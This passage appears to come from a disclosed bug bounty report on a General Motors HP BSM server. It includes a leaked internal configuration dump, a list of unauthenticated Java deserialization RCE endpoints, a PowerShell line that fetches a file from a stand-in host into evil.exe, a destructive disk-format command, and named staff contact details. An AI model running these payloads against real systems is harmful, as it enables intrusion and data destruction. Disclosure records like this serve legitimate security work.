  590. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
  591. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  592. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  593. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
  594. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
  595. internalsubsomain.was.here.gm.com:80 /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  596. internalsubsomain.was.here.gm.com:80 /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
  597. internalsubsomain.was.here.gm.com:80 /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
  598. internalsubsomain.was.here.gm.com:80 /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
  599. internalsubsomain.was.here.gm.com:80 /axis2 Exact uriworkermap -1 0 0 - - - - 0
  600. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
  601. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
  602. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  603. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  604. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
  605. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
  606. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  607. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
  608. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
  609. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
  610. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2 Exact uriworkermap -1 0 0 - - - - 0
  611. [S|E|R] Worker Status for tvWorker
  612.  
  613. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  614. ajp13 127.0.0.1 127.0.0.1:21002 0 0 0 0 2 0
  615.  
  616. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  617. OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 0 254430
  618. URI Mappings for tvWorker (2 maps) [Hide]
  619.  
  620. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  621. internalsubsomain.was.here.gm.com:80 /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
  622. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
  623. [S|E|R] Worker Status for odbWorker
  624.  
  625. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  626. ajp13 127.0.0.1 127.0.0.1:21215 0 0 0 0 2 0
  627.  
  628. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  629. OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 2 254426
  630. URI Mappings for odbWorker (4 maps) [Hide]
  631.  
  632. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  633. internalsubsomain.was.here.gm.com:80 /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
  634. internalsubsomain.was.here.gm.com:80 /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
  635. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
  636. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
  637. Legend [Hide]
  638.  
  639. Name Worker name
  640. Type Worker type
  641. Route Worker route
  642. Act Worker activation configuration
  643. ACT=Active, DIS=Disabled, STP=Stopped
  644. State Worker error status
  645. OK=OK, ERR=Error with substates
  646. IDLE=No requests handled, BUSY=All connections busy,
  647. REC=Recovering, PRB=Probing, FRC=Forced Recovery
  648. D Worker distance
  649. F Load Balancer factor
  650. M Load Balancer multiplicity
  651. V Load Balancer value
  652. Acc Number of requests
  653. Sess Number of sessions created
  654. Err Number of failed requests
  655. CE Number of client errors
  656. RE Number of reply timeouts (decayed)
  657. Wr Number of bytes transferred
  658. Rd Number of bytes read
  659. Busy Current number of busy connections
  660. Max Maximum number of busy connections
  661. Con Current number of backend connections
  662. RR Route redirect
  663. Cd Cluster domain
  664. Rs Recovery scheduled in app. min/max seconds
  665. LR Seconds since last reset of statistics counters
  666. LE Timestamp of the last error
  667. JK Status Manager Start Page
  668.  
  669. Copyright © 1999-2014, The Apache Software Foundation
  670. Licensed under the Apache License, Version 2.0.
  671.  
  672. ---
  673.  
  674. 2017-03-11 08:20:18 +0000: @cayce (comment)
  675. /jkstatus?cmd=dump
  676.  
  677. Exposes the webserver root directory as well as internal service ports:
  678.  
  679. JK Status Manager for vulnerable.host.gm.com:443
  680.  
  681. Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 03:15:08 Eastern Standard Time
  682. JK Version: mod_jk/1.2.40 Unix Seconds: 1489220108
  683. Change format
  684. [Back to worker list]
  685. Configuration Data
  686.  
  687. This dump does not include any changes applied by the status worker to the configuration after the initial startup
  688. ServerRoot=E:/HPBSM/WebServer
  689. ps=\
  690. worker.list=localAjp, wdeWorker, tvWorker, odbWorker, JKStatus
  691. worker.localAjp.type=ajp13
  692. worker.localAjp.port=8009
  693. worker.localAjp.host=127.0.0.1
  694. worker.localAjp.connection_pool_size=200
  695. worker.wdeWorker.type=ajp13
  696. worker.wdeWorker.port=8010
  697. worker.wdeWorker.host=127.0.0.1
  698. worker.wdeWorker.connection_pool_size=120
  699. worker.odbWorker.type=ajp13
  700. worker.odbWorker.port=21215
  701. worker.odbWorker.host=127.0.0.1
  702. worker.odbWorker.connection_pool_size=120
  703. worker.tvWorker.type=ajp13
  704. worker.tvWorker.port=21002
  705. worker.tvWorker.host=127.0.0.1
  706. worker.tvWorker.connection_pool_size=25
  707. worker.JKStatus.type=status
  708. JK Status Manager Start Page
  709.  
  710. Copyright © 1999-2014, The Apache Software Foundation
  711. Licensed under the Apache License, Version 2.0.
  712.  
  713. ---
  714.  
  715. 2017-03-11 08:28:05 +0000: @cayce (comment)
  716. This "status" page is a gold mine ... allowing trusted users unauthenticated access to EDIT system configuration of "Big Data", nice!
  717.  
  718. /jkstatus?cmd=edit&from=show&w=localAjp
  719.  
  720. JK Status Manager for vulnerable.host.gm.com:443
  721.  
  722. [Back to worker view]
  723. Edit worker settings for localAjp
  724.  
  725. Hostname:
  726. 127.0.0.1
  727. Port:
  728. 8009
  729. Connection Pool Timeout:
  730. 0
  731. Ping Timeout:
  732. 10000
  733. Connect Timeout:
  734. 0
  735. Prepost Timeout:
  736. 0
  737. Reply Timeout:
  738. 0
  739. Retries:
  740. 2
  741. Retry Interval:
  742. 100
  743. Connection Ping Interval:
  744. 0
  745. Recovery Options:
  746. 0
  747. Max Packet Size:
  748. 8192
  749.  
  750. Update Worker
  751. JK Status Manager Start Page
  752.  
  753. Copyright © 1999-2014, The Apache Software Foundation
  754. Licensed under the Apache License, Version 2.0.
  755.  
  756. *******
  757. /jkstatus?cmd=reset&from=show&w=localAjp
  758. Is also available but, I don't want to 'reset' without permission.
  759.  
  760. ---
  761.  
  762. 2017-03-11 08:38:16 +0000: @cayce (comment)
  763. I just received a 500 when attempting to access status. Are you performing defensive measures? If so, please advise accepted status.
  764.  
  765. FYI, if firewalling a single IP is the approach ... new IP gives me 200 just fine ; )
  766.  
  767. ---
  768.  
  769. 2017-03-11 09:12:08 +0000: @cayce (comment)
  770. Additional servlet endpoints identified as unauthed remote RCE exploitable:
  771. (See initial report, PoCs and additional information references)
  772.  
  773. /topaz/authorizationcontrol
  774. /topaz/authorizationmanagment
  775.  
  776. ---
  777.  
  778. 2017-03-11 09:49:12 +0000: @cayce (comment)
  779. I'm seeing some new behavior with this server.
  780.  
  781. I see the implementation of "WWW-Authenticate: Basic realm="HP BSM"" on the server side which I don't recall logging previously.
  782.  
  783. Either way, while making the get unserialized (browser/proxy/script), I do receive the expected "401 Unauthorized". However, while sending serialized payloads, I receive "500 Internal Server Error", the server is still processing the request despite lacking auth. Seems the "WWW-Authenticate" measure is not applied.
  784.  
  785. ---
  786.  
  787. 2017-03-11 18:09:13 +0000: @cubo (comment)
  788. Thank you for the additional information. We have validated the jkstatus information disclosure. We are working on validating the RCE component. When you built the payload did you use the groovy serialization payload option for all of the POCs ?
  789.  
  790. ---
  791.  
  792. 2017-03-11 18:24:13 +0000: @cayce (comment)
  793. Yeah, groovy gadgets seem to be getting it done but, there's likely other Java serialization attacks.
  794.  
  795. I recommend searching the entire system for java ".jar" files, unpack (change extension to zip, unzip) and then grep through them for "new ObjectInputStream".
  796.  
  797. ---
  798.  
  799. 2017-03-11 19:01:14 +0000: @cayce (comment)
  800. Access to powershell seems unrestricted, this is hardening 101 for modern Windows systems. It really ought not be available but, since it is; I recommend using it to do your bidding on/from this host.
  801.  
  802.  
  803.  
  804. ---
  805.  
  806. 2017-03-12 02:52:58 +0000: @cayce (comment)
  807. Re: "We have validated the jkstatus information disclosure."
  808. 3) Out of Scope
  809. Missing best practices, information disclosures, use of a known-vulnerable libraries or descriptive / verbose / unique error pages (without substantive information indicating exploitability)
  810.  
  811. I'd like to clarify this point. More specifically, my notes tie this endpoint's disclosure directly to the discovery of the additional endpoints /topaz/authorizationcontrol and /topaz/authorizationmanagment). It's important for your team to distinguish between a purely informational disclosure with no impact ("Apache/IIS" disclosure) versus disclosure that has significant impact, especially that of additional vectors. The impact of these "lows" ought to be felt and understood more clearly while in the light of the final attack vectors during the course of your incident response lessons learned meetings.
  812.  
  813. Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
  814.  
  815. ---
  816.  
  817. 2017-03-12 08:11:25 +0000: @cubo (comment)
  818. We have evaluated your submission and validated the vulnerability that you’ve reported. We are investigating next steps. Thanks again for your submission and for providing proper details.
  819.  
  820. ---
  821.  
  822. 2017-03-12 09:10:44 +0000: @cayce (comment)
  823. I would like to know who will be handling disclosure/bounty with HPE. They claim to have had a bounty program in the past but, I can't find any evidence of it's activities currently. I've tried to reach out to support@hackerone.com for several days now but, have been completely ignored without response.
  824.  
  825. ---
  826.  
  827. 2017-03-12 09:18:53 +0000: @cayce (comment)
  828. Re: "We have evaluated your submission and validated the vulnerability that you’ve reported"
  829. Would you please be more explicit about what has been validated. I have reported many vulnerabilities and several exploits.
  830.  
  831. Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
  832.  
  833. /tvb/remoteProxy
  834. /bpi/remoteProxy
  835. /topaz/authorizationcontrol
  836. /topaz/authorizationmanagment
  837.  
  838. ---
  839.  
  840. 2017-03-12 17:43:41 +0000: @cayce (comment)
  841. I've identified the following endpoints providing unauthenticated, remote access.
  842. /topaz/download
  843. /topaz/upload
  844.  
  845. Would your team validate or approve fuzzing?
  846.  
  847. ---
  848.  
  849. 2017-03-12 18:13:07 +0000: @cayce (comment)
  850. Additional Java deserialization RCE endpoint:
  851. /topaz/remoteProxy
  852.  
  853. ---
  854.  
  855. 2017-03-13 01:20:00 +0000: @cubo (comment)
  856. You have mentioned being able to execute powershell. Do you have a POC for powershell execution through the serialization vector ?
  857.  
  858. ---
  859.  
  860. 2017-03-13 02:24:17 +0000: @cayce (comment)
  861. OK based on this question, your gadgets must be working yes? If so, please confirm your findings so that I can better assist your team with this investigation.
  862.  
  863. Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
  864.  
  865. /tvb/remoteProxy
  866. /bpi/remoteProxy
  867. /topaz/authorizationcontrol
  868. /topaz/authorizationmanagment
  869.  
  870. Yes or No?
  871.  
  872. Additionally, we are well past the 24 hour point relevant toward a critical exposure of internal assets. I find the absence of response to my queries a bit disappointing to say the least. Are we working together on this or against each other?
  873.  
  874. Please respond to the aforementioned requests ASAP so I can continue to help secure your application better than the vendor that sold it to you.
  875. 1: Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
  876. (now three)
  877.  
  878. 2: I've identified the following endpoints providing unauthenticated, remote access.
  879. /topaz/download
  880. /topaz/upload
  881.  
  882. Will your team validate or approve fuzzing?
  883.  
  884. 3: Additional Java deserialization RCE endpoint:
  885. /topaz/remoteProxy
  886.  
  887.  
  888. I've attached a simple PoC using powershell. For a quick roundup of modern powershell abuse techniques, please review anything by harmj0y et al. as well as this blog post by MS:
  889. https://blogs.msdn.microsoft.com/powershell/2016/09/27/powershell-security-at-derbycon
  890.  
  891. ---
  892.  
  893. 2017-03-13 02:53:01 +0000: @cayce (comment)
  894. Here is better one.
  895.  
  896. ---
  897.  
  898. 2017-03-13 04:54:39 +0000: @cayce (comment)
  899. I'm seeing activity from the following nodes:
  900. 173.194.93.9
  901. 74.125.41.8
  902.  
  903. Would you please confirm that these are associated with your investigation and not unknown actors?
  904.  
  905. ---
  906.  
  907. 2017-03-13 18:12:53 +0000: @cubo (comment)
  908. We are actively working through the validation process to ensure we capture the root-cause of the issue. That said, we need additional information. Please provide video evidence of successful payload execution and the http response you are receiving when executing to ensure we have everything we need.
  909. Again, thank you for your patience as we work through this issue. We prioritize all findings based on their criticality and work to resolve them timely stay tuned for updates
  910.  
  911.  
  912. ---
  913.  
  914. 2017-03-14 22:50:00 +0000: @cayce (hacker requested mediation)
  915. I don't know where to begin here ...
  916.  
  917. The biggest issue for me is disclosure to the vendor (if the program participant hasn't already). I was under the impression that this is part of the H1 service. Aside from likely getting screwed out of CVEs and any potential bounty cash from the vendor because I was mistaken about the role H1 plays in the responsible disclosure cycle, myself and an unknown number of users (FTE/Contract/Freelance) working on behalf of the program participant are privy to the presence of multiple pre-auth, RCEs. It's been five days, these users could be leveraging these exploits to their own advantage.
  918.  
  919. I signed up to H1 to deliver high quality findings as well as reports. This is difficult to do without some teamwork.
  920.  
  921. Program Participant:
  922. The client has ignored most if not all of my requests. They are now asking for video evidence of findings I've not made. I'm quite sure they are confused about something and not sure how to validate what has been reported. Furthermore just now after a quick test, it looks as though they are applying fixes without acceptance of reported vulnerabilities and associated exploits. Is it acceptable that program participants are able to stall while making changes without crediting the researcher?
  923.  
  924. H1:
  925. It's been almost a week already (I sent initial request 3/10, received actual response from Adam Bacchus (adambacchus) with little to no useful information. I've responded a few times to that e-mail (a couple one-liners out of frustrated haste, apologies about that) and I've not gotten much response at all from anyone at H1. I'm hopefully that there is diligent work happening behind the scenes with the vendor? I've read many positive reviews about H1's integrity; I'm hoping I won't be an exception.
  926.  
  927. best,
  928. cayce
  929.  
  930. ---
  931.  
  932. 2017-03-15 02:28:18 +0000: @cayce (comment)
  933. What is it that your team doesn't understand how to validate?
  934.  
  935. I've was going to attach another PoC but, it looks as though your team is already applying remediation measures before assigning credit. While this is left unclear, I'm not highly motivated to continue testing if the testing environment has changed without notification. If this isn't communicated to your tester, they will likely waste a lot of their time as well as that of your team, unnecessarily.
  936.  
  937. Output from a listener:
  938.  
  939. The Collaborator server received a DNS lookup of type A for the domain name randomaddress.burpcollaborator.net.
  940. The lookup was received from IP address 198.208.47.21 at 2017-Mar-14 19:57:25 UTC.
  941.  
  942. Output from whois says it's GM:
  943.  
  944. $ whois 198.208.47.21
  945.  
  946. #
  947. # ARIN WHOIS data and services are subject to the Terms of Use
  948. # available at: https://www.arin.net/whois_tou.html
  949. #
  950. # If you see inaccuracies in the results, please report at
  951. # https://www.arin.net/public/whoisinaccuracy/index.xhtml
  952. #
  953.  
  954.  
  955. #
  956. # Query terms are ambiguous. The query is assumed to be:
  957. # "n 198.208.47.21"
  958. #
  959. # Use "?" to get help.
  960. #
  961.  
  962. #
  963. # The following results may also be obtained via:
  964. # https://whois.arin.net/rest/nets;q=198.208.47.21?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
  965. #
  966.  
  967. NetRange: 198.208.0.0 - 198.208.255.255
  968. CIDR: 198.208.0.0/16
  969. NetName: GM-198-208-C
  970. NetHandle: NET-198-208-0-0-1
  971. Parent: NET198 (NET-198-0-0-0-0)
  972. NetType: Direct Assignment
  973. OriginAS: AS30383
  974. Organization: General Motors LLC (GMED)
  975. RegDate: 1993-06-29
  976. Updated: 2016-06-14
  977. Ref: https://whois.arin.net/rest/net/NET-198-208-0-0-1
  978.  
  979.  
  980. OrgName: General Motors LLC
  981. OrgId: GMED
  982. Address: 200 Renaissance Center
  983. City: Detroit
  984. StateProv: MI
  985. PostalCode: 48265
  986. Country: US
  987. RegDate: 1990-11-16
  988. Updated: 2016-06-29
  989. Ref: https://whois.arin.net/rest/org/GMED
  990.  
  991.  
  992. OrgAbuseHandle: GCD2-ARIN
  993. OrgAbuseName: GM Cyber Defense
  994. OrgAbusePhone: +1-313-432-2919
  995. OrgAbuseEmail: abuse@gm.com
  996. OrgAbuseRef: https://whois.arin.net/rest/poc/GCD2-ARIN
  997.  
  998. OrgTechHandle: KARUP2-ARIN
  999. OrgTechName: Karuppannan, Venkatachalam
  1000. OrgTechPhone: +1-313-667-2256
  1001. OrgTechEmail: venkatachalam.karuppannan@gm.com
  1002. OrgTechRef: https://whois.arin.net/rest/poc/KARUP2-ARIN
  1003.  
  1004. OrgNOCHandle: MER41-ARIN
  1005. OrgNOCName: Rudnick, Micki E.
  1006. OrgNOCPhone: +1-248-303-5079
  1007. OrgNOCEmail: micki.rudnick@gm.com
  1008. OrgNOCRef: https://whois.arin.net/rest/poc/MER41-ARIN
  1009.  
  1010.  
  1011. #
  1012. # ARIN WHOIS data and services are subject to the Terms of Use
  1013. # available at: https://www.arin.net/whois_tou.html
  1014. #
  1015. # If you see inaccuracies in the results, please report at
  1016. # https://www.arin.net/public/whoisinaccuracy/index.xhtml
  1017. #
  1018.  
  1019.  
  1020.  
  1021. This is a good enough indicator that some or all of the payload was executed on GM's system.
  1022.  
  1023. Your team can confirm this with your own host and a gadget using a payload such as:
  1024. powershell.exe -Command "& {wget 'https://spooky.driveby.mom' -OutFile '%TEMP%\evil.exe'}"
  1025. (If this doesn't work for you, you can try several variations depending upon your powershell version. During my testing many of the modern commandlets returned positive results but, your team could just ask the admin or do some host analysis and make an educated guess as to the powershell version.)
  1026.  
  1027. While sniffing traffic on spooky.driveby.mom, you will see your desired traffic/"callback"/beacon.
  1028.  
  1029. Since your team has or is able to attain authorized access to this node, why not just review the system logs for record of execution?
  1030.  
  1031. Would your team test the following payload in a groovy gadget against a DISPOSABLE system?
  1032.  
  1033. ***** ... WARNING ... *****
  1034. DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
  1035. ***** ... WARNING ... *****
  1036.  
  1037. powershell.exe -Command "Get-Partition -DiskNumber 1 -PartitionNumber 1 | Format-Volume -Force -FileSystem NTFS"
  1038.  
  1039. ***** ... WARNING ... *****
  1040. DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
  1041. ***** ... WARNING ... *****
  1042.  
  1043. After your team is able to confirm execution, they can proceed to escalate beyond protective measures. While under the terms of the bounty agreement, many techniques typically used MAY fall into "out of bounds" range hence, the CONSTANT updates and requests for approval. At anytime your team has the ability to ask for more or less testing. As I've mentioned and your team has yet to acknowledge or authorize, this node has both upload and download service endpoints exposed waiting to be tested; this would be a great starting place for your red team or any other adversaries to begin to escalate toward full persistence. As my hands are tied until your team communicates authorization and I'd like to avoid entrapment, your red team can review the following article from the friendly folks at NetSPI (https://blog.netspi.com). *** Personal Note: Affiliation = none. This group has been around since 2001 (well before HP's imperialism) and has contributed a lot over the years. They also make some tools, maybe check them out for the next product bake-off? *** With a two year old vintage, some bits may be dated but, your red team ought be able to use similar techniques in more modern ways.
  1044.  
  1045. 15 Ways to Bypass the PowerShell Execution Policy:
  1046. https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy
  1047.  
  1048. If your team doesn't care about this production server any longer (considering this is a two year old bug and many more eyes than mine have seen this, you ought not) and would like to communicate authorization for more intrusive (potentially destructive) testing, just say the word! Once your team confirms authorization for further testing against this production system or provides an alternative test system, we can take the gloves off.
  1049.  
  1050. A video? Really? Based on displayed comprehension to date, I think videos would just prove to create more confusion for your team. Here your team can find some well produced videos for review:
  1051. http://www.securitytube.net
  1052.  
  1053. Honestly, if I thought a video would help you somehow, I might consider throwing more good time at this bad problem but ...
  1054. https://www.youtube.com/watch?v=a3WcuvL737A
  1055.  
  1056. Producing accurate, artifact free, high quality videos is time consuming (I've wasted several hours on this response alone). I've done my best to be patient and as helpful as I can be yet, your team has ignored me at every step of the way and I'm not in the habit of rewarding bad behavior. Rewarding bad behavior is exactly what has ultimately lead to this compromise. If your team MUST have a video for the holiday party, I'll do my best to create something educational but, only when we get on the same page and I am certain your team understands the mechanics of the attack vector.
  1057.  
  1058. Lastly, your request for evidence seems out of scope from my perspective since, I've not made any claim to be able to generate outbound traffic using the HTTP protocol. I could try to generate outbound HTTP traffic if you like but, I think bounty programs aren't as much of a penetration test exercise as they are an application/service review. Are you requesting I perform a penetration test against your firewalls? If so, please confirm. *** Disclaimer: No affiliation or contact *** If your organization is seeking "Hacker-Powered Application Security AND Penetration Testing" bounty service, you might want to contact the self acclaimed "Crowd Security Intelligence" group Synack (https://www.synack.com). My impression of the intent of most bounty programs is that they exist to identify and fix vulnerabilities as well as their associated exploits in products and services; not to secure an entire enterprise. Currently, any unknown pre-authenticated user has access to execute code on your system and generate a "callback". Exploitation will occur under the context of the service performing the callback which, in your case is likely Admin or SYSTEM level. Nice right? I guess you're cool with that, I would not be if I were admin.
  1059.  
  1060. P.S. - Additional finding:
  1061. Unnecessary services installed and running.
  1062. Sure, I see it's filtered and yet to identify exploitability but, c'mon 2005 is calling ... is NetBIOS still a thing for this host? I've yet to see a single sign of hardening performed for this host, feels more like a honeypot more than it does a production server.
  1063.  
  1064. $sudo nmap -O --osscan-guess vulnerable.host.gm.com
  1065. 139/tcp filtered netbios-ssn
  1066.  
  1067. How to: Disable NetBIOS over TCP/IP
  1068. Updated: 5 December 2005
  1069. Servers in the perimeter network should have all unnecessary protocols disabled including NetBIOS. Web servers and Domain Name System (DNS) servers do not require NetBIOS. This protocol should be disabled to reduce the threat of user enumeration.
  1070.  
  1071. The WINS tab of the Advanced TCP/IP Settings dialog box contains a Disable NetBIOS over TCP/IP option. Selecting this option only disables the NetBIOS Session Service (which listens on TCP port 139). It does not disable NetBIOS completely.
  1072.  
  1073. (https://technet.microsoft.com/en-us/library/ms143696(v=sql.90).aspx)
  1074.  
  1075. [Please excuse typos, I'm sick of proofing this]
  1076.  
  1077. ---
  1078.  
  1079. 2017-03-16 11:29:22 +0000: @cayce (comment)
  1080. I'm receiving the following for all of the endpoints I just checked:
  1081.  
  1082. 502 - Web server received an invalid response while acting as a gateway or proxy server.
  1083. There is a problem with the page you are looking for, and it cannot be displayed. When the Web server (while acting as a gateway or proxy) contacted the upstream content server, it received an invalid response from the content server.
  1084.  
  1085. It's finally offline! Looks like your team was able to validate the RCE after all. Good job!
  1086.  
  1087. Let me know if you need any further testing performed.
  1088.  
  1089. ---
  1090.  
  1091. 2017-03-17 15:39:48 +0000: @cubo (comment)
  1092. We’ve implemented fixes and will keep you updated on final remediation status.
  1093.  
  1094. ---
  1095.  
  1096. 2017-03-21 09:41:08 +0000: @cayce (comment)
  1097. powershell PoC functional break-down:
  1098.  
  1099. (aa1_cmd) (aa1_cmdx) (aa3_fwrite)
  1100. powershell > wget (or something like it depending upon PS version) > File write
  1101.  
  1102. This PoC performs several Easily Identifiable Actions Resulting in Artifacts:
  1103. (or EIARA for short)
  1104. 1: Invokation of remote command(s)/script(s)
  1105. Evidence: host process/user event logs
  1106. 2: IP based web request
  1107. a) HTTP (get it)
  1108. Evidence: wire traffic, server/client process logs
  1109. b) DNS (where to get it)
  1110. Evidence: wire traffic, server/client process logs
  1111. 3: Local file write (%TEMP% or E:/HPBSM/WebServer)
  1112. Evidence: file presence, host process/user event logs
  1113.  
  1114. - Point one is a blindly inferred tautology due to the OR condition for points two and
  1115. three.
  1116. - Point two has been documented to be true by return of DNS artifacts.
  1117. - Point three is inferred to be true upon documented (request/response copy/pasted below)
  1118. return of a 500 server error message (as opposed to a 40*) when request for
  1119. https://vulnerable.host.gm.com/tehgoat.jpg is made.
  1120.  
  1121. (Due to HTTP restrictions, it is believed that this ought have been an empty file. If
  1122. it wasn't empty and someone opened it, sorry 'bout that!)
  1123.  
  1124. As this is/was a production server, I felt it imprudent to perform excessive write/comms attempts (potentially, unintentionally creating further exposure) while working on the particulars of escalation and persistence without explicit consent.
  1125.  
  1126. Arbitrary write access coupled with encrypted exfil channel = game over. Tastes like chicken; how do you like your chicken? Fried, boiled, BBQed, baked, roasted ... etc.
  1127.  
  1128. That said, in an attempt to passively validate and escalate this exposure remotely, the following steps were taken with the goal of triggering additional reference points within alternative defensive mechanisms:
  1129.  
  1130. Attempt to trigger "End-Point"/AV protection:
  1131. "End-Point" defense hype products or even old school AV/FIM ought always be deployed
  1132. properly on production systems (even if only for low-hanging fruit)
  1133.  
  1134. Requests were made for EICAR test file (https://secure.eicar.org/eicar.com.txt) with
  1135. output writing to "evil.exe".
  1136.  
  1137. I may not have dialed in the write directory at first and don't see that I had a
  1138. chance to make record of validation as proven with 500 for tehgoat.jpg. Also, initial
  1139. tests missed the mark on this due to HTTP restrictions. Instead, a more direct route
  1140. is to simply echo the string to output. I revised my payloads but, never came back
  1141. around to it since I saw evidence of write access further along and remediation had begun
  1142. by this point.
  1143.  
  1144. Attempt to trigger egress protection:
  1145. When malware from the 90s calls home, it does so explicitly. Any well defended/monitored
  1146. network will have something functionally equivalent to "split DNS"; any and all
  1147. direct DNS record checking from network clients ought be investigated as either an
  1148. incident or a misconfiguration.
  1149.  
  1150. I was able to generate DNS requests to a domain of my choosing which is doing my bidding.
  1151. DNS requests are typically made to the system assigned DNS server yet, this default
  1152. system behavior can easily be manipulated by a client program to allow for a direct
  1153. query. I changed my payload to support direct DNS requests such as this and in doing
  1154. so, I believe the domain used during this testing was identified by some defense
  1155. mechanism as, hours after use within PoCs this domain started to appear on some very
  1156. unique behavioral blacklists. This could be the result of traditionally weak blacklist
  1157. qualifications (likely) but, I find it an interesting coincidence to say the least.
  1158. Despite not being thrilled about drawing mal-attention toward an innocent domain
  1159. provider, I would be thrilled with a finding of proactive defensive measures being
  1160. effective!
  1161.  
  1162. ---
  1163.  
  1164. 2017-03-21 09:49:33 +0000: @cayce (comment)
  1165. Request:
  1166.  
  1167. GET /tehgoat.jpg HTTP/1.1
  1168. Host: vulnerable.host.gm.com
  1169. Connection: close
  1170. Upgrade-Insecure-Requests: 1
  1171. User-Agent: tehduckneedsmorefloyd v0.9
  1172. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  1173. Accept-Encoding: gzip, deflate, sdch, br
  1174. Accept-Language: en-US,en;q=0.8
  1175. Cookie: JSESSIONID=sfPuoutTTASpacesaucePFFQx
  1176.  
  1177. Response:
  1178. HTTP/1.1 500 Internal Server Error
  1179. Content-Type: text/html;charset=UTF-8
  1180. Server: Microsoft-IIS/8.5
  1181. X-Powered-By: JSP/2.2
  1182. X-Powered-By: ARR/2.5
  1183. Date: Sat, 11 Mar 2017 10:16:08 GMT
  1184. Connection: close
  1185. Content-Length: 6247
  1186.  
  1187. ---
  1188.  
  1189. 2017-03-21 09:57:43 +0000: @cayce (comment)
  1190. While it's likely irrelevant at this point, FWIW my notes indicate that the following end-points likely suffer from the aforementioned deserialization attack vector:
  1191.  
  1192. /filters/CategoriesServlet
  1193. /filters/FiltersServlet
  1194.  
  1195. Feel free to confirm a minimum of six pre-auth, RCEs, if you like.
  1196.  
  1197. ---
  1198.  
  1199. 2017-03-27 18:48:21 +0000: @cayce (comment)
  1200. Good luck with your program!
  1201.  
  1202. ---
  1203.  
  1204. 2017-03-30 17:23:20 +0000: @hackerone-support (external user joined)
  1205.  
  1206.  
  1207. ---
  1208.  
  1209. 2017-04-12 22:38:48 +0000: @cayce (comment)
  1210. Your team's last response was over 26 days ago. It's safe to say that your team has validated, responded, re-mediated without recognition or reward (read stolen my work).
  1211.  
  1212. I'd like to finalize for publishing so, please make any additional comments in a swift manner.
  1213.  
  1214. ---
  1215.  
  1216. 2017-04-13 20:48:07 +0000: @cubo (bug informative)
